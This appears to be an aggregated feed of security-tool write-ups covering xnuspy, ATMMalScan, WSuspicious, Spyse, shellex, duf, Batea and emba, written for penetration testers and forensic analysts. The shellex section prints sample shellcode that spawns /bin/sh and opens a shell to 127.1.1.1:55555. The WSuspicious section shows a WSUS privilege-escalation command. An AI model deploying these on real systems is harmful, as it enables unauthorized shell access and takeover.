Finally, the shared mapping is marked as executable* and a unconditional immediate branch (B) is assembled. It directs execution to the start of tramp, and is what replaces the first instruction of the now-hooked kernel function. Unfortunately, this limits us from branching to hook structures more than 128 MB away from a given kernel function. xnuspy does check for this scenario before booting and falls back to unused code already in the kernelcache for the hook structures to reside on instead if it finds that this could happen.

*not exactly what happens, what actually happens produces that effect


Device Security

This module completely neuters KTRR/AMCC lockdown and KPP. I don't recommend using this on a daily driver.


Other Notes

I do my best to make sure the patchfinders work, so if something isn't working please open an issue.



ATMMalScan - Tool for Windows which helps to search for malware traces on an ATM during the DFIR process

$
0
0


ATMMalScan is a commandline tool for Windows operating systems version 7 and higher, which helps to search for malware traces on an ATM during the DFIR process. This tool examines the running processes of a system, as well as the hard disk, depending on the specified file path. To scan a system, a user with standard rights is sufficient. However, ATMMalScan provides the best results with administrator privileges.


Known issues:

Currently ATMMalScan does not support codepages that require Unicode, this means Windows operating systems that are set to e.g. Cyrillic or Chinese characters, no representative result can be guaranteed.


Requirements:

Make sure at least Visual C++ Redistributable for Visual Studio 2015 has been installed on the ATM, you like to scan.


Usage (Example)

Step1 => Scan process memory and disk. ===> Check if Admin privileges are available on the device for best results!



Step2 => ATMMalScan detected a Malware called XFS_DIRECT in a process, gives details about the thread and its rules matches. Further a full processmemory dump has been saved to disk, to catch the malicious process, its modules, as well as its stack and heap pages.



Step3 => Dump can be found here => .\Dump



Step4 => Open dumpfile with Windbg and extract the ATM malware to disk using ".writemem"



Step5 => Repair the dumped PE with one of your favorite PE-Fixers and start analysing the malware in detail.




WSuspicious - A Tool To Abuse Insecure WSUS Connections For Privilege Escalations

$
0
0


This is a proof of concept program to escalate privileges on a Windows host by abusing WSUS. Details in this blog post: https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/ It was inspired from the WSuspect proxy project: https://github.com/ctxis/wsuspect-proxy


Acknowledgements

Privilege escalation module written by Maxime Nadeau from GoSecure

Huge thanks to:

  • Julien Pineault from GoSecure and Mathieu Novis from ‎SecureOps for reviving the WSUS proxy attack
  • Romain Carnus from GoSecure for coming up with the HTTPS interception idea
  • Paul Stone and Alex Chapman from Context Information Security for writing and researching the original proxy PoC

Usage

The tool was tested on Windows 10 machines (10.0.17763 and 10.0.18363) in different domain environments.

Usage: WSuspicious [OPTION]...
Ex. WSuspicious.exe /command:"" - accepteula - s - d cmd / c """"echo 1 > C:\\wsuspicious.txt"""""" /autoinstall

Creates a local proxy to intercept WSUS requests and try to escalate privileges.
If launched without any arguments, the script will simply create the file C:\\wsuspicious.was.here

/exe The full path to the executable to run
Known payloads are bginfo and PsExec. (Default: .\PsExec64.exe)
/command The command to execute (Default: -accepteula -s -d cmd /c ""echo 1 > C:\\wsuspicious.was.here"")
/proxyport The port on which the proxy is started. (Default: 13337)
/downloadport The port on which the web server hosting the payload is started. (Sometimes useful for older Windows versions)
If not specified, the server will try to intercept the request to the legitimate server instead.
/debug Increase the verbosity of the tool
/autoinstall Start Windows updates automatically after the proxy is started.
/enabletls Enable HTTPS interception. WARNING. NOT OPSEC SAFE.
This will prompt the user to add the certificate to the trusted root.
/help Display this help and exit

Compilation

The ILMerge dependency can be used to compile the application into a standalone .exe file. To compile and compile the application, simply use the following command:

dotnet msbuild /t:Restore /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /t:ILMerge /p:TrimUnusedDependencies=true


Recon Simplified with Spyse

$
0
0

One of the major struggles in bug bounty hunting is to collect and analyze data during reconnaissance, especially when there are a lot of tools around but very few that offer actually useful results. The job of eliminating false positives and unrelated data from your recon becomes harder as the size of your target increases.

Most popular tools used by bug bounty hunters like Knockpy, Sublist3r, and Subfinder are command line based and often difficult to use when the size of the target becomes bigger. With a lot of results provided, it becomes harder and longer to filter out the most important ones, remove unnecessary results, and pick the right investigation vector. However, some companies are still trying to simplify the recon process by rethinking old approaches and implementing UI/UX, and technical features.

Spyse is that reconnaissance automation framework that every bug bounty hunter should test at least once.

Reconnaissance process

At the core of reconnaissance is OSINT and data analysis, one needs to analyze a target and map out its infrastructure efficiently.

To become familiar with your target's attack surface, you need to perform recon in a proper manner and gather information about its assets. For that, it's crucial to enumerate all the assets belonging to the investigated target (domains, sub-domains, IP address, etc) and related assets, basically everything that is closely connected to the main target.

By doing it precisely, anyone can easily spot the low hanging fruits such as sub-domain takeovers that can have a huge impact.

Spyse is the tool that simplifies this process and makes your routine work easier by storing all needed information in one place and pointing where to look first.

Faster Reconnaissance

Be the fastest in reaching your target's assets. Bug Bounty Hunting is a rat race – the faster you are able to fully analyze your target's attack surface, the more the chances of scoring a bounty. There is competition in every field, but with close to a million bug bounty hunters working across platforms – at any given time there may be hundreds of thousands of bug bounty hunters working on a specific target of a bug bounty program, which leads us to the biggest hurdle – time.

If you are not able to optimize your reconnaissance workflow and reduce the time you spend on your targets, you will lag behind the others. If you are at par with the others, and stick to the usual tools, you still stay average – but with an industry-leading solution like Spyse, you not just become fast but faster than the others.

With Spyse, it's just a plug-and-play operation. It has all the necessary data about your targets already collected, even before you begin to hunt on a target, and the advanced search filter mechanism is way better than most command-line based open source tools..

Doing Recon on New Targets has never been easier

If you run the traditional tools just after you get access to a new target, it might take days to just collect the data on larger targets and, yet more time to analyze and make sense of it. Spyse's  advanced search feature can get you to the same results in less than a fraction of a second.

You can search for information about your target domain name (say, Target.com), from Spyse's collection of over 4.5B domain name records, all indexed.


Search your target in over 25TB database.
Search your target in over 25TB database.


Not just another Cybersecurity Search Engine

Spyse is not just another cybersecurity search engine, it's an advanced yet simple Reconnaissance framework of sorts. Unlike Censys and Shodan, Spyse offers a user friendly filter which doesn't make use of advanced query syntax, dorks, etc.
Spyse's advanced search feature is aimed to be simple to use, user friendly yet efficient and precise. The
advanced search lets you hit your goal by tuning the search parameters to exactly the targets you are after – minimizing false positives and inaccurate results.


Advanced Search Filter to find Apache servers belonging to a target
Advanced Search Filter to find Apache servers belonging to a target

For example, if you are looking for Apache servers in a particular target's infrastructure, you can set the search filters to match your target's Organization name (domain name or, AS or, IP ranges) and add another filter, Site info > HTTP Header > Name and Value to Server and Apache respectively, and let the backend handle the rest for you.

The Database


Spyse has collected and indexed over 4.5B domains
Spyse has collected and indexed over 4.5B domains

Spyse has gathered data of over 217.1M hosts with open ports, indexed 4.5B domains, 66M SSL/TLS certificates, 371M email-related data, 143.7K vulnerabilities, 1.2M organizations and more. Learn more about their data statistics here.

Having to deal with so much data on large scope bug bounty targets during recon makes it incredibly difficult and tedious to scan these assets, and perform reconnaissance at scale. However, Spyse collects and updates this data on a regular basis, and indexes it, making it easier to filter out small bits of information that are important for your recon.

The whole database updates once a week except for some types of data that do not change too often, like domains.

Managing Recon Data

Spyse has taken care of it. It is difficult to manage vast amounts of gathered information. Some hunters who have advanced development knowledge prefer to make their own automation with a proper backend and database of targets, yet they tend to miss out on lots of data and find it hard to manage, & correlate it.
However, with Spyse you don't need advanced development skills, because it crawls, collects and connects all the data about your targets.

Developing a web application to manage the whole process might be beneficial but it will cost you lots of work. Nevertheless, you have Spyse that can be implemented with other tools simply through the API connection. This should save the time you would have otherwise spent running only manual command line tools.

Filtering subdomains by Response Code

You can also filter your target's assets by response code (for example – 200 status code, for valid request), which helps you quickly find interesting assets from a large number of target subdomains and domains. This is a very handy feature while doing recon on any target, as it gives you a quick overview of the publicly accessible assets of your target.


Browsing targets by status code (for example, 200 status code)
Browsing targets by status code (for example, 200 status code)

Export Recon Data in JSON/CSV Format

Spyse has a very handy data export feature that lets you quickly export your scan data in JSON and CSV format. Whether you like to see your data in Excel or, implement it in your own application or, visualize it using ElasticSearch, Spyse has got you covered. It also makes it easier for you to use the exported data with other custom tools (most tools support JSON/CSV data, as its a common format).


Export reconnaissance data in multiple formats – JSON or, CSV
Export reconnaissance data in multiple formats – JSON or, CSV

Large Scope

Spyse can easily handle a lot of information. With conventional tools, you can miss a lot of information while working on large targets but with Spyse – it's no longer a problem!

Spyse not just gathered an incredibly large dataset of assets, It structured all of them in an understandable and intuitive way with loads of conclusions that indicate vulnerable or just interesting parts of the target.

Find out how everything is connected:

Spyse IP data output
Spyse IP data output


Easily locate related data:

Spyse related data
Spyse related data


Understand vulnerability level of the target and explore found vulnerabilities:

Instant Vulnerability assessment of the target
Instant Vulnerability assessment of the target


Benefit from ready made conclusion based on data analysis:

Ready-made conclusions made by Spyse
Ready-made conclusions made by Spyse


Data Visualization

The web interface lets you visualize your target's data more efficiently and in a better manner than other tools. This helps you take decisions easily, and find vulnerable assets more easily than using conventional tools. With bigger targets like Yahoo having as many as 143.4k sub-domains, using conventional tools like subfinder becomes harder, but with Spyse you can visualize the relationships between different assets, and decide where to spend your time while hunting on the target's assets.


Spyse's advanced data gathering solution gives you an extremely intuitive interface to search through loads of data and offers you a visual approach to dealing with large amounts of recon information.

All Around Solution for OSINT Data Analysis (Conclusion)

Instead of moving back and forth between different tools that give inaccurate data, using the stunning UI makes it easier to wade through a sea of OSINT data. Use it for quick target overview alone or in combination with other tools and remove all unnecessary amnual work.

In conclusion, explore a wide variety of Spyse’s tools that will help you to find exact piece of information.



Most necessary tools:

  • Subdomain Finder - Finding sub-domains on large targets is now way easier with their advanced sub-domain finder tool.
  • Reverse IP Lookup - Add more assets to your target's scope with the advanced Reverse IP look up tool, and find vulnerable hosts using Reverse IP Lookups.
  • Port Scanner - Look for open ports on your targets with the advanced port scanner tool, and filter through IP addresses of targets based on open ports.
  • ASN Lookup - To look up ASNs of your bug bounty targets.
  • Company Lookup - Makes it easy to collect data about the acquisitions of your target company, and gives you access to more scope while hunting.










Shellex - C-shellcode To Hex Converter, Handy Tool For Paste And Execute Shellcodes In Gdb, Windbg, Radare2, Ollydbg, X64Dbg, Immunity Debugger And 010 Editor

$
0
0


C-shellcode to hex converter.

Handy tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger& 010 editor.


Are you having problems converting C-shellcodes to HEX (maybe c-comments+ASCII mixed?)

Here is shellex. If the shellcode can be compiled in a C compiler shellex can convert it.

Just execute shellex, paste the shellcode c-string and press ENTER.

To end use Control+Z(Windows)/Control+D(Linux)

Converting c-shellcode-multi-line-hex+mixed_ascii (pay attention in the mixed part \x68//sh\x68/bin\x89):

"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

shellex output:

6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

Converting c-shellcode-multi-line-with-comments:

"\x68"
"\x7f\x01\x01\x01" // <- IP: 127.1.1.1
"\x5e\x66\x68"
"\xd9\x03" // <- Port: 55555
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce"

shellex output:

68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE

Do you need the shellex output as a new c-shellcode-string? just use -h parameter, example converting the shellex output:

./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80

Installation
git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git

For Windows:

binary:

shellex\bins\shellex.exe

For Linux

Deps:

sudo apt-get install tcc

binary:

shellex/linuxbins/shellex

Paste & Execute shellcode in ollydbg, x64dbg, immunity debugger

Just use my xshellex plugin:

https://github.com/David-Reguera-Garcia-Dreg/xshellex


Paste & Execute shellcode in gdb
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String to a file as raw binary data with "echo":
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
  • gdb /bin/ls
  • starti

Write the binary file to the current instruction pointer:

for 32 bits:

restore /tmp/sc binary $eip
x/30b $eip
x/15i $eip

for 64 bits:

restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip

x/30b is the size in bytes of the shellcode, you can get the size with:

wc -c /tmp/sc

x/15i is the number of instructions to display, you can get the correct number (maybe) with ndisasm:

sudo apt-get install nasm

For 32 bits:

ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l

For 64 bits:

ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l

Paste & Execute shellcode in gdb-gef
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert with: echo "SPACE shellex_output" | sed "s/ / 0x/g"
echo " 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80" | sed "s/ / 0x/g"

Use patch byte command:

For 32 bits:

patch byte $eip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

For 64 bits:

patch byte $rip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

Execute context command and check if the disasm is correct


Paste & Execute shellcode in gdb-peda
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 32 bits:

patch $eip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

For 64 bits:

patch $rip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

Execute context command and check if the disasm is correct


Paste & Execute shellcode in windbg
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D

via eb

For small shellcodes eb can be fine, just use shellex output with eb command (thx Axel Souchet @0vercl0k for the hint)

For 32 bits:

eb @eip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 64 bits:

eb @rip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

via file
  • convert the shellex output to raw binary data with certutil:
echo 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 > C:\Users\Dreg\sc.hex
certutil -f -decodeHex c:\Users\Dreg\sc.hex c:\Users\Dreg\sc
del C:\Users\Dreg\sc.hex

certutil output:

Input Length = 92
Output Length = 30
CertUtil: -decodehex command completed successfully.

The lenght of our shellcode is 30, then use L0n30 in windbg.

Write the binary file to the current instruction pointer:

for 32 bits:

.readmem C:\Users\Dreg\sc @eip L0n30

for 64 bits:

.readmem C:\Users\Dreg\sc @rip L0n30

Paste & Execute shellcode in radare2
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String in radare2 using the "w" command:

For 32 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @eip

For 64 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @rip

Check if the shellcode is well-pasted:

Get the size of the shellcode in a terminal with:

echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" | wc -c

The output of last command is 30, Now use pD command in radare2:

pD 30

Non interactive mode

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Linux:

echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Windows:

echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe

Via multi-line-file in Windows:

C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe

Via multi-line-file in Linux:

dreg@fr33project# cat sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
dreg@fr33project# cat sc.txt | shellex

Compilation

For Windows just use Visual Studio 2013

For Linux just:

cd shellex/shellex
gcc -o shellex shellex.c
./shellex


Duf - Disk Usage/Free Utility (Linux, BSD, macOS & Windows)

$
0
0


Disk Usage/Free Utility (Linux, BSD, macOS & Windows)


Features
  • User-friendly, colorful output
  • Adjusts to your terminal's width
  • Sort the results according to your needs
  • Groups & filters devices
  • Can conveniently output JSON

Installation

Packages

Linux

BSD
  • FreeBSD: pkg install duf

macOS
  • with Homebrew: brew install duf
  • with MacPorts: sudo port selfupdate && sudo port install duf

Windows
  • with scoop: scoop install duf

Android
  • Android (via termux): pkg install duf

Binaries
  • Binaries for Linux, FreeBSD, OpenBSD, macOS, Windows

From source

Make sure you have a working Go environment (Go 1.12 or higher is required). See the install instructions.

Compiling duf is easy, simply run:

git clone https://github.com/muesli/duf.git
cd duf
go build

Usage

You can simply start duf without any command-line arguments:

duf

If you supply arguments, duf will only list specific devices & mount points:

duf /home /some/file

If you want to list everything (including pseudo, duplicate, inaccessible file systems):

duf --all

You can show and hide specific tables:

duf --only local,network,fuse,special,loops,binds
duf --hide local,network,fuse,special,loops,binds

You can also show and hide specific filesystems:

duf --only-fs tmpfs,vfat
duf --hide-fs tmpfs,vfat

Sort the output:

duf --sort size

Valid keys are: mountpoint, size, used, avail, usage, inodes, inodes_used, inodes_avail, inodes_usage, type, filesystem.

Show or hide specific columns:

duf --output mountpoint,size,usage

Valid keys are: mountpoint, size, used, avail, usage, inodes, inodes_used, inodes_avail, inodes_usage, type, filesystem.

List inode information instead of block usage:

duf --inodes

If duf doesn't detect your terminal's colors correctly, you can set a theme:

duf --theme light

If you prefer your output as JSON:

duf --json

Troubleshooting

Users of oh-my-zsh should be aware that it already defines an alias called duf, which you will have to remove in order to use duf:

unalias duf



Batea - AI-based, Context-Driven Network Device Ranking

$
0
0


Batea is a context-driven network device ranking framework based on the anomaly detection family of machine learning algorithms. The goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. We call those Gold Nuggets.

For more information about Gold Nuggeting and the science behind Batea, check out our whitepaper here

You can try Batea on your nmap scan data without downloading the software, using Batea Live: https://batea.delvesecurity.com/



How it works

Batea works by constructing a numerical representation (numpy) of all devices from your nmap reports (XML) and then applying anomaly detection methods to uncover the gold nuggets. It is easily extendable by adding specific features, or interesting characteristics, to the numerical representation of the network elements.

The numerical representation of the network is constructed using features, which are inspired by the expertise of the security community. The features act as elements of intuition, and the unsupervised anomaly detection methods allow the context of the network asset, or the total description of the network, to be used as the central building block of the ranking algorithm. The exact algorithm used is Isolation Forest (https://en.wikipedia.org/wiki/Isolation_forest)

Machine learning models are the heart of Batea. Models are algorithms trained on the whole dataset and used to predict a score on the same (and other) data points (network devices). Batea also allows for model persistence. That is, you can re-use pretrained models and export models trained on large datasets for further use.


Usage
# Complete info
$ sudo nmap -A 192.168.0.0/16 -oX output.xml

# Partial info
$ sudo nmap -O -sV 192.168.0.0/16 -oX output.xml


$ batea -v output.xml

Installation
$ git clone git@github.com:delvelabs/batea.git
$ cd batea
$ python3 setup.py sdist
$ pip3 install -r requirements.txt
$ pip3 install -e .

Developers Installation
$ git clone git@github.com:delvelabs/batea.git
$ cd batea
$ python3 -m venv batea/
$ source batea/bin/activate
$ python3 setup.py sdist
$ pip3 install -r requirements-dev.txt
$ pip3 install -e .
$ pytest

Example usage
# simple use (output top 5 gold nuggets with default format)
$ batea nmap_report.xml

# Output top 3
$ batea -n 3 nmap_report.xml

# Output all assets
$ batea -A nmap_report.xml

# Using multiple input files
$ batea -A nmap_report1.xml nmap_report2.xml

# Using wildcards (default xsl)
$ batea ./nmap*.xml
$ batea -f csv ./assets*.csv

# You can use batea on pretrained models and export trained models.

# Training, output and dumping model for persistence
$ batea -D mymodel.batea nmap_report.xml

# Using pretrained model
$ batea -L mymodel.batea nmap_report.xml

# Using preformatted csv along with xml files
$ batea -x nmap_report.xml -c portscan_data.csv

# Adjust verbosity
$ batea -vv nmap_report.xml

How to add a feature

Batea works by assigning numerical features to every host in the report (or series of report). Hosts are python objects derived from the nmap report. They consist of the following list of attributes: [ipv4, hostname, os_info, ports] where ports is a list of ports objects. Each port has the following list of attributes : [port, protocol, state, service, software, version, cpe, scripts], all defaulting to None.

Features are objects inherited from the FeatureBase class that instantiate a specific _transform method. This method always takes the list of all hosts as input and returns a lambda function that maps each host to a numpy column of numeric values (host order is conserved). The column is then appended to the matrix representation of the report. Features must output correct numerical values (floats or integers) and nothing else.

Most feature transformations are implemented using a simple lambda function. Just make sure to default a numeric value to every host for model compatibility.

Ex:

class CustomInterestingPorts(FeatureBase):
def __init__(self):
super().__init__(name="some_custom_interesting_ports")

def _transform(self, hosts):
"""This method takes a list of hosts and returns a function that counts the number
of host ports member from a predefined list of "interesting" ports, defaulting to 0.

Parameters
----------
hosts : list
The list of all hosts

Returns
-------
f : lambda function
Counts the number of ports in the defined list.
"""
member_ports = [21, 22, 25, 8080, 8081, 1234]
f = lambda host: len([port for port in host.ports if port.port in member_ports])
return f

You can then add the feature to the report by using the NmapReport.add_feature method in batea/__init__.py

from .features.basic_features import CustomInterestingPorts

def build_report():
report = NmapReport()
#[...]
report.add_feature(CustomInterestingPorts())

return report

Using precomputed tabular data (CSV)

It is possible to use preprocessed data to train the model or for prediction. The data has to be indexed by (ipv4, port) with one unique combination per row. The type of data should be close to what you expect from the XML version of an nmap report. A column has to use one of the following names, but you don't have to use all of them. The parser defaults to null values if a column is absent.

  'ipv4',
'hostname',
'os_name',
'port',
'state',
'protocol',
'service',
'software_banner',
'version',
'cpe',
'other_info'

Example:

ipv4,hostname,os_name,port,state,protocol,service,software_banner
10.251.53.100,internal.delvesecurity.com,Linux,110,open,tcp,rpcbind,"program version port/proto service100000 2,3,4 111/tcp rpcbind100000 2,3,4 "
10.251.53.100,internal.delvesecurity.com,Linux,111,open,tcp,rpcbind,
10.251.53.188,serious.delvesecurity.com,Linux,6000,open,tcp,X11,"X11Probe: CentOS"

Outputing numerical representation

For the data scientist in you, or just for fun and profit, you can output the numerical matrix along with the score column instead of the regular output. This can be useful for further data analysis and debug purpose.

$ batea -oM network_matrix nmap_report.xml


Emba - An Analyzer For Linux-based Firmware Of Embedded Devices

$
0
0


emba is being developed as a firmware scanner that analyses already-extracted Linux-based firmware images. It should help you to identify and focus on the interesting areas of a huge firmware image. Although emba is optimized for offline firmware images, it can test both, live systems and extracted images. Additionally, it can also analyze kernel configurations. emba is designed to assist a penetration tester. It is not designed as a standalone tool without human interaction. emba is designed to give as much information as possible about the firmware. The tester can decide on the areas to focus on and is always responsible for verifying and interpreting the results.


How to use it?

Before starting, check that all dependencies are met and use the installer.sh script: ./emba.sh -d or ./emba.sh -d -F


Arguments:
Test firmware / live system
-a [MIPS] Architecture of the linux firmware [MIPS, ARM, x86, x64, PPC]
-A [MIPS] Force Architecture of the linux firmware [MIPS, ARM, x86, x64, PPC] (disable architecture check)
-l [./path] Log path
-f [./path] Firmware path
-e [./path] Exclude paths from testing (multiple usage possible)
-m [MODULE_NO.] Test only with set modules [e.g. -m p05 -m s10 ... ]]
(multiple usage possible, case insensitive, final modules aren't selectable, if firmware isn't a binary, the p modules won't run)
-c Enable cwe-checker
-g Create grep-able log file in [log_path]/fw_grep.log
Schematic: MESSAGE_TYPE;MODULE_NUMBER;SUB_MODULE_NUMBER;MESSAGE
-E Enable automated qemu emulation tests (WARNING this module could harm your host!)

Dependency check
-d Only check dependencies
-F Check dependencies but ignore errors

Special tests
-k [./config] Kernel config path

Modify output
-s Print only relative paths
-z Add ANSI color codes to log

Help
-h Print this help message

Docker Container

There is a simple docker-compose setup added which allows you to do everything outside use the cwe-checker

To run it simply do the following:

Build it:

docker-compose build emba

Run it:

FIRMWARE=/absolute/path/to/firmware LOG=/home/n/firmware_log/ docker-compose run emba

This will drop you a shell in the folder where emba has been added. The firmware is located at /firmware/ and the log directory at /log/

./emba.sh -l /log/ -f /firmware/

Examples

Static firmware testing:
  • Extract the firmware from an update file or from flash storage with binwalk or something else
  • Execute emba with set parameters, e.g.

sudo ./emba.sh -l ./logs/arm_test -f ./firmware/arm_firmware/


 

  • Path for logs and firmware path are necessary for testing successfully (WARNING: emba needs some free disk space for logging)
  • Architecture will be detected automatically; you can overwrite it with -a [ARCH]
  • Use -A [ARCH] if you don't want to use auto detection for architecture
  • emba currently supports the following architectures: MIPS, ARM, PPC, x86 and x64

Live testing:

For testing live system with emba run it as if you were testing static firmware, but with / as firmware path:

sudo ./emba.sh -l ./logs/local_test -f /

  • Path for logs and firmware path are necessary for testing successfully
  • Architecture will be detected automatically; you can overwrite it with -a [ARCH]
  • Use -A [ARCH] if you don't want to use auto detection for architecture
  • The paths /proc and /sys will be automatically excluded
  • It improves output and performance, if you exclude docker
    -e /var/lib/docker

Test kernel config:

Test only a kernel configuration with the kernel checker of checksec:

sudo ./emba.sh -l ./logs/kernel_conf -k ./kernel.config

  • If you add -f ./firmware/x86_firmware/, it will ignore -k and search for a kernel config inside the firmware

Good to know:


Dependencies

emba uses multiple other tools and components.

For using emba with all features, you will need following tools on your Kali Linux:

  • readelf
  • find
  • grep
  • modinfo
  • realpath
  • sed
  • cut
  • sort
  • basename
  • strings
  • Option: tree
  • Option: shellcheck
  • Option: docker
  • Option: yara
  • Option: qemu static user mode emulators
  • Option: binwalk

To check these dependencies, only run sudo ./emba.sh -d

For installation of all needed dependencies, run sudo ./installer.sh


Structure
├── installer.sh

-> Tries to install all needed dependencies. Internet access for downloading is required.

  • Afterwards no Internet access is needed
├── check_project.sh

-> Check full project with all subdirectories with shellchecker

  • Install it on your system (Kali) with apt-get install shellcheck
├── emba.sh

-> Main script of this project

├── config

-> Configuration files for different modules with file names, regular expressions or paths. These files are very handy, easy to use and they also keep the modules clean.

├── external

-> All tools and files which are from other projects and necessary for emba

├── helpers

-> Some scripts for stuff like pretty formatting on your terminal or path handling

└── modules

-> The stars of the project - every module is an own file and will be called by emba.


External tools in directory 'external'

How to write own modules?

Look here - read this file, copy and modify it. Add your main function, where module_log_init and module_title are been called to the emba script. That's it. Or if you only want to run a single command: Add your command to user_check and uncomment user_check in the emba script.



